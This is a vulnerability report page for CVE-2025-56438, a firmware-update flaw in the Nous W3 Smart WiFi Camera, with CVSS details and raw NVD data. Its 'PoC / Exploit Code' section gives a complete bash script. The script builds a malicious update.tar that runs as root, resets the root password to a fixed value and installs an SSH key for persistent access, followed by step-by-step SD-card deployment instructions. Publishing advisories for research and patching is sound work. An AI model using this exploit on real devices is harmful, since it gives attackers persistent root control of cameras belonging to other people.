Security Vulnerability Report
CVE-2025-56438 CVSS 6.8 MEDIUM

CVE-2025-56438

Published: 2025-10-24 15:15:39
Last Modified: 2026-04-15 00:35:42

Description

An issue in the firmware update mechanism of Nous W3 Smart WiFi Camera v1.33.50.82 allows unauthenticated and physically proximate attackers to escalate privileges to root via supplying a crafted update.tar archive file stored on a FAT32-formatted SD card.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Nous W3 Smart WiFi Camera v1.33.50.82

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-56438 PoC - Nous W3 Smart WiFi Camera Firmware Update Exploitation
# This script creates a malicious update.tar for privilege escalation

# Create directory structure
mkdir -p exploit_update/system/sdcard
cd exploit_update

# Create malicious script that will be executed with root privileges
# (the inner chpasswd here-document uses its own terminator, PWEOF, so that it
# does not close the outer 'EOF' here-document early)
cat > system/sdcard/run.sh << 'EOF'
#!/bin/sh
# Reverse shell or privilege escalation payload
# This script will be executed as root

# Create new root user or modify existing
chpasswd << PWEOF
root:password123
PWEOF

# Add SSH public key for persistent access
mkdir -p /root/.ssh
chmod 700 /root/.ssh
echo 'ssh-rsa AAAA...' > /root/.ssh/authorized_keys

# Log successful exploitation
echo "[$(date)] CVE-2025-56438 exploit successful" >> /tmp/exploit_log.txt
EOF
chmod +x system/sdcard/run.sh

# Create the malicious update.tar archive
# (written to the parent directory so the cleanup below does not delete it)
tar -cvf ../update.tar system/

# Cleanup
cd ..
rm -rf exploit_update

echo "Malicious update.tar created successfully"
echo "Instructions:"
echo "1. Format SD card as FAT32"
echo "2. Copy update.tar to SD card root directory"
echo "3. Insert SD card into Nous W3 Smart WiFi Camera"
echo "4. Reboot the device to trigger exploitation"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56438", "sourceIdentifier": "[email protected]", "published": "2025-10-24T15:15:39.137", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in the firmware update mechanism of Nous W3 Smart WiFi Camera v1.33.50.82 allows unauthenticated and physically proximate attackers to escalate privileges to root via supplying a crafted update.tar archive file stored on a FAT32-formatted SD card."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}]}], "references": [{"url": "http://nous.com", "source": "[email protected]"}, {"url": "https://github.com/MMarble21/Smart-camera-privilege-escalation/blob/main/ADVISORY.md", "source": "[email protected]"}]}}